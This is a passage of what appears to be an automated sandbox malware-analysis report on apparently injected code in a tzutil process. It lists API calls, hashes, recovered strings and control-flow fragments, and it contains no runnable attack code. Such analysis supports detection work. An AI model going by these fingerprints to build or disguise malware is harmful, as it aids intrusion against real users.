• Opcode Fuzzy Hash: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
• Instruction Fuzzy Hash: 00211CB9A00248ABDB14DF98DC41FEFB7B9EF89704F108109F948AB340D774A9158FA5
APIs
Memory Dump Source
• Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
Yara matches
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
• Instruction ID: 6f144bf7abd136d9ad2b2fa06a230837a5610d2041440cbe47b75384327bf8ca
• Opcode Fuzzy Hash: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
• Instruction Fuzzy Hash: 1611C2796013087AD760EB68CC45FEFB3ADDF85704F108009F94CAB240DB7079058BA6
APIs
• NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 028D97B1
Memory Dump Source
• Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
• Instruction ID: 83be303cfe9e453600a97292237ddf829cf0f50e8e334369a160ebfbcaeef9b9
• Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
• Instruction Fuzzy Hash: 25E0863A201604BBD110FA5DDC00F97B75DEFC6711F008015FA48A7240C671B9148BF1
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b2f0c765446f32031cf88b1e0ed6beacc8b847b3b74046634a661f43da951c0b
• Instruction ID: d6a00159de13e3c5da6c5974ccf79255e443c656af57428682e895e2da413453
• Opcode Fuzzy Hash: b2f0c765446f32031cf88b1e0ed6beacc8b847b3b74046634a661f43da951c0b
• Instruction Fuzzy Hash: 6D900431705C0413D144F15C4DC45474005D7F4701F55D011F0435554CCF15CF575371
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 28dd05a2db7237ee6eed4d434289e1828886f7553815526a6b3d60100bbb5388
• Instruction ID: 0c480668f04ac46e948b79e2841c17db9c45c9915bb762d709a74cd9af379c8f
• Opcode Fuzzy Hash: 28dd05a2db7237ee6eed4d434289e1828886f7553815526a6b3d60100bbb5388
• Instruction Fuzzy Hash: 2B900471701D04434144F15C4D044077005D7F57013D5D115F0555570CC71DCD55D37D
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 88f2c61cc71ce36b2d5cd86c5ea7d18a59ed9c67d9450edf7e51e189a77b1846
• Instruction ID: 2b7920d0418d3bf954549324a161d02124e909a1b5d6c921bd4ee7f43d055fd0
• Opcode Fuzzy Hash: 88f2c61cc71ce36b2d5cd86c5ea7d18a59ed9c67d9450edf7e51e189a77b1846
• Instruction Fuzzy Hash: C6900261202804034109B1584514616400A87E4601B55D021E1015590DC72689916125
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 7a64bbe26419d7412c5c9b1bb3507967609a12ec44812c705ca1760b1cdfbff8
• Instruction ID: 322650276d8a8504e30df95ccd9974720aaca6611f4a52a0181ac4a3a0c5ef76
• Opcode Fuzzy Hash: 7a64bbe26419d7412c5c9b1bb3507967609a12ec44812c705ca1760b1cdfbff8
• Instruction Fuzzy Hash: 5690023160580C03D154B1584514746000587D4701F55D011A0025654D87568B5576A1
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 2dd1df815af5e678d9bc93fecfd2db77d95ce7da52ad7a49c7e5d2fea0314d85
• Instruction ID: ff3153612c95c9bf7418793e8359072ccd65556e1483a6aa838921a4b5bac87d
• Opcode Fuzzy Hash: 2dd1df815af5e678d9bc93fecfd2db77d95ce7da52ad7a49c7e5d2fea0314d85
• Instruction Fuzzy Hash: AA90023120180C03D184B158450464A000587D5701F95D015A0026654DCB168B5977A1
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 34d7b59cd2d075cc7a029632e3c78e6beb477400f147b1029f8c5f557b79d72e
• Instruction ID: bdec1e244da58b3a3625e439212c3c975b356dd66d414e746c8ab3fb8236b27f
• Opcode Fuzzy Hash: 34d7b59cd2d075cc7a029632e3c78e6beb477400f147b1029f8c5f557b79d72e
• Instruction Fuzzy Hash: 8390023120584C43D144B1584504A46001587D4705F55D011A0065694D97268E55B661
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ce98c26bb034806eacbec305b06f686f12d1d4d503642377dbdc0e1f06c8bcd5
• Instruction ID: a3bf62f55b6bd452146dfef60fcb90e7e840930dc897198424ae9051227b9188
• Opcode Fuzzy Hash: ce98c26bb034806eacbec305b06f686f12d1d4d503642377dbdc0e1f06c8bcd5
• Instruction Fuzzy Hash: 2B900435311C0403010DF55C07045070047C7DD751355D031F1017550CD733CD715131
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: bcc652ef63fd5fb355f325c93965c827113f0df9b000a56a1c82fc1cb10cdc9f
• Instruction ID: d0a0490889babb543d6a479968d5b6338d655e256c51e332fea0306a0e2488cd
• Opcode Fuzzy Hash: bcc652ef63fd5fb355f325c93965c827113f0df9b000a56a1c82fc1cb10cdc9f
• Instruction Fuzzy Hash: 11900225221804030149F558070450B044597DA751395D015F1417590CC72289655321
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ad6c8f3448c676b904baa4dc0feb353d3423d3e64e6dc431d0f121283e1f4475
• Instruction ID: 4cbbe993c7a0077781106531c9a9897c4ea17a588e69793899a7717707800e0e
• Opcode Fuzzy Hash: ad6c8f3448c676b904baa4dc0feb353d3423d3e64e6dc431d0f121283e1f4475
• Instruction Fuzzy Hash: DD90026134180843D104B1584514B060005C7E5701F55D015E1065554D871ACD526126
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e831d71eff7b1468f8502effa1aa94c68b22333f68fdb7db7eb5f109efa11173
• Instruction ID: 9ec5e9b26d7c2038dcf86520956d5f998cbb815199630204263ca2110021ff96
• Opcode Fuzzy Hash: e831d71eff7b1468f8502effa1aa94c68b22333f68fdb7db7eb5f109efa11173
• Instruction Fuzzy Hash: 42900221601804434144B16889449064005ABE5611755D121A0999550D875A89655665
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 393ed5c2a52aa5e6e134bea70566524df962e42d21f3ec2709e8cca9f2c13da3
• Instruction ID: 3b558277d715a7d3bd22ec889b697d3eb2ebe74f45de585988536bfc94dd8190
• Opcode Fuzzy Hash: 393ed5c2a52aa5e6e134bea70566524df962e42d21f3ec2709e8cca9f2c13da3
• Instruction Fuzzy Hash: 00900221211C0443D204B5684D14B07000587D4703F55D115A0155554CCB1689615521
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a9af7557d3c00d2883684051a3acf0eb6737659895cb0df68520ad80a6988b0d
• Instruction ID: 4322f083587ca7e263fd9dbd06853270cdc16840cb86d2a7029bc46ad92c60b7
• Opcode Fuzzy Hash: a9af7557d3c00d2883684051a3acf0eb6737659895cb0df68520ad80a6988b0d
• Instruction Fuzzy Hash: AD90022160180903D105B1584504616000A87D4641F95D022A1025555ECB268A92A131
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 67718aec50b472001d249e41515a592ad278bcc363435035a6a7ddd4267a4ddd
• Instruction ID: 448fb4461873297abbce62fb04fa9663fe237b27eda2032a1d239e312509b951
• Opcode Fuzzy Hash: 67718aec50b472001d249e41515a592ad278bcc363435035a6a7ddd4267a4ddd
• Instruction Fuzzy Hash: 0C900261201C0803D144B5584904607000587D4702F55D011A2065555E8B2A8D516135
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b41ece1b171a4f7179af90905bb671bc78d0281b34be184adf74c3e8fc7f22c4
• Instruction ID: 08d74ea5aa4ee914bb66bf2d776a735d8ac3e1eb52bd0b25c81b4dd9abd39b33
• Opcode Fuzzy Hash: b41ece1b171a4f7179af90905bb671bc78d0281b34be184adf74c3e8fc7f22c4
• Instruction Fuzzy Hash: 2090022921380403D184B158550860A000587D5602F95E415A0016558CCB1689695321
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 41a98d910681bc070fd7a9473af5879e09598b724bd2857fda4e82b5688e2e31
• Instruction ID: 1d6be6f881577b58657fee55b370efd2b4f04aad8d6833d880dcd20efda069a5
• Opcode Fuzzy Hash: 41a98d910681bc070fd7a9473af5879e09598b724bd2857fda4e82b5688e2e31
• Instruction Fuzzy Hash: 2290022130180403D144B15855186064005D7E5701F55E011E0415554CDB1689565222
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 1aa1a63a2abaabb4e1e9c12c2ef604fb8515d4391a526d55c5fd9e3e3a6921fa
• Instruction ID: d5b059ab8823b0c47fbe6b6c8f6e9c75dc477de2a5063ec0b4a0ba7d330668c5
• Opcode Fuzzy Hash: 1aa1a63a2abaabb4e1e9c12c2ef604fb8515d4391a526d55c5fd9e3e3a6921fa
• Instruction Fuzzy Hash: 1E900221242845535549F1584504507400697E4641795D012A1415950C87279956D621
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 328590cec20eea04cb506733ca2e2c2f2f87e9264b559aa99a6660f0346d0a25
• Instruction ID: 57acc7bdc75403b526ae999df4dc7f994bd743a139b0ddf596870d8cd8cd1424
• Opcode Fuzzy Hash: 328590cec20eea04cb506733ca2e2c2f2f87e9264b559aa99a6660f0346d0a25
• Instruction Fuzzy Hash: 3B90023120180813D115B1584604707000987D4641F95D412A0425558D97578A52A121
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 216b38be99530de67ce56af334e25a51aca21746cb704a8a8058c2d31b802a16
• Instruction ID: 484e3f84f130a6e2537cbf0f04b743dfa7b3784918a298c65b36ba0a896a03f4
• Opcode Fuzzy Hash: 216b38be99530de67ce56af334e25a51aca21746cb704a8a8058c2d31b802a16
• Instruction Fuzzy Hash: 3C90023120188C03D114B158850474A000587D4701F59D411A4425658D879689917121
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e920c026e7868087f6edff319702a4de242a422ab3376a44c5d41299645ce0a4
• Instruction ID: 090354a28c9dffe3941f39f1aee9703fa7aaf87be8112a314202c9bb311ddef1
• Opcode Fuzzy Hash: e920c026e7868087f6edff319702a4de242a422ab3376a44c5d41299645ce0a4
• Instruction Fuzzy Hash: DF90023120180C43D104B1584504B46000587E4701F55D016A0125654D8716C9517521
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 88896a45e68346fbc62f2ecc5140e9f6821e890f0e52e3bf64f25e7f808f2c2b
• Instruction ID: 6c1bc5d287457dfec1785702f69b51632eff13ff601256d6576cfbe4255f8930
• Opcode Fuzzy Hash: 88896a45e68346fbc62f2ecc5140e9f6821e890f0e52e3bf64f25e7f808f2c2b
• Instruction Fuzzy Hash: 0490023120180803D104B5985508646000587E4701F55E011A5025555EC76689916131
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 8a266f2748304f3e0f32836d21762705f08ff2d1ffc12d13226869ff8d6b4673
• Instruction ID: d66a03258bfc2093e265cc569defb09514af33c2e88bab33211f9d3036ee27d8
• Opcode Fuzzy Hash: 8a266f2748304f3e0f32836d21762705f08ff2d1ffc12d13226869ff8d6b4673
• Instruction Fuzzy Hash: E990023160590803D104B1584614706100587D4601F65D411A0425568D87968A5165A2
APIs
Memory Dump Source
• Source File: 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
• Associated: 00000008.00000002.3258113218.0000000003289000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.000000000328D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3160000_tzutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: f5b0464008921b7ce906a5f5c75870a3cc01dc72d9d1201b1634c7da13578f0e
• Instruction ID: f4836a5573d8a0627e0bd09f064908733d7ef83cf0e21d65350424bc30b6982e
• Opcode Fuzzy Hash: f5b0464008921b7ce906a5f5c75870a3cc01dc72d9d1201b1634c7da13578f0e
• Instruction Fuzzy Hash: 0790022124585503D154B15C45046164005A7E4601F55D021A0815594D875689556221

Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed)
control_flow_graph 429 28c114d-28c1158 430 28c11d8-28c1247 call 28db890 call 28dc2a0 call 28c4990 call 28b13e0 call 28d2000 429->430 431 28c115a-28c1166 429->431 445 28c1249-28c1258 PostThreadMessageW 430->445 446 28c1267-28c126d 430->446 432 28c1168 431->432 433 28c11c3-28c11d4 431->433 432->433 445->446 447 28c125a-28c1264 445->447 447->446
APIs
• PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 028C1254
Strings
Memory Dump Source
• Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: UQ63g7r-$UQ63g7r-
• API String ID: 1836367815-2341035416
• Opcode ID: 86fcdc446e042d08d8ee4f19affcbd7d11a4edc46b5e057bf5dc132545be1675
• Instruction ID: 7737bddee35d5b146b68c8419a5179fa7f9499364b5232ddb471925e26928ad4
• Opcode Fuzzy Hash: 86fcdc446e042d08d8ee4f19affcbd7d11a4edc46b5e057bf5dc132545be1675
• Instruction Fuzzy Hash: C621077AA0424C7AEB01EA995C82DEE7B7CEF40394B00816DE908E7241D7349D098BE2

Control-flow Graph (rendered graph not captured)
APIs
• PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 028C1254
Strings
Memory Dump Source
• Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: UQ63g7r-$UQ63g7r-
• API String ID: 1836367815-2341035416
• Opcode ID: 8e127785f9fbc15939f7294d992161831dd232f71603d106665b2f674b383fa6
• Instruction ID: 0a4526d4ec10a9d318b69c2923d2e3a58dc5778e697960c0ff520497250e3fe6
• Opcode Fuzzy Hash: 8e127785f9fbc15939f7294d992161831dd232f71603d106665b2f674b383fa6
• Instruction Fuzzy Hash: BC11827A90024C7AEB109AE44CC1DEF7B7CDF41694F048158FA58F7240D6349E098BA2

Control-flow Graph (rendered graph not captured)
APIs
• PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 028C1254
Strings
Memory Dump Source
• Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: UQ63g7r-$UQ63g7r-
• API String ID: 1836367815-2341035416
• Opcode ID: 3ef7e33776fd51efe08ba38bed222d1d2d7fe35c9b17609095cb232add0010db
• Instruction ID: 0233784d1f3c2d1a4aed585631979d7aa1d730b6a334c9628c8eebbe5152aa92
• Opcode Fuzzy Hash: 3ef7e33776fd51efe08ba38bed222d1d2d7fe35c9b17609095cb232add0010db
• Instruction Fuzzy Hash: 5B0161BA90025C7AEB11ABE45C81DEF7B7C9F41694F058058FA58E7240D6345E098BA2
APIs
• Sleep.KERNELBASE(000007D0), ref: 028D3EDD
Strings
Memory Dump Source
• Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: c89d466a1f537602cdcc88f765f3ba306b210e40e28f7bc2ed7a6c4283033478
• Instruction ID: 61122a2b87019528d83baf215bc3a17c747e1b098acbed68c4d53572ee236327
• Opcode Fuzzy Hash: c89d466a1f537602cdcc88f765f3ba306b210e40e28f7bc2ed7a6c4283033478
• Instruction Fuzzy Hash: 99318EB9A01605BBD714DFA4CC80FEBBBB9EB88714F00415CE61D9B240D774AA04CFA1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeUninitialize
                                                                    • String ID: @J7<
                                                                    • API String ID: 3442037557-2016760708
                                                                    • Opcode ID: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                                    • Instruction ID: b9c871c2c7e3de7739ade666eed2b97f55c38f11fd086b5e55714b0336e18d78
                                                                    • Opcode Fuzzy Hash: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                                    • Instruction Fuzzy Hash: 0731327AA00209AFDF14DFD8C8809EFB7BAFF48304F108559E505E7214D771EA058BA0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
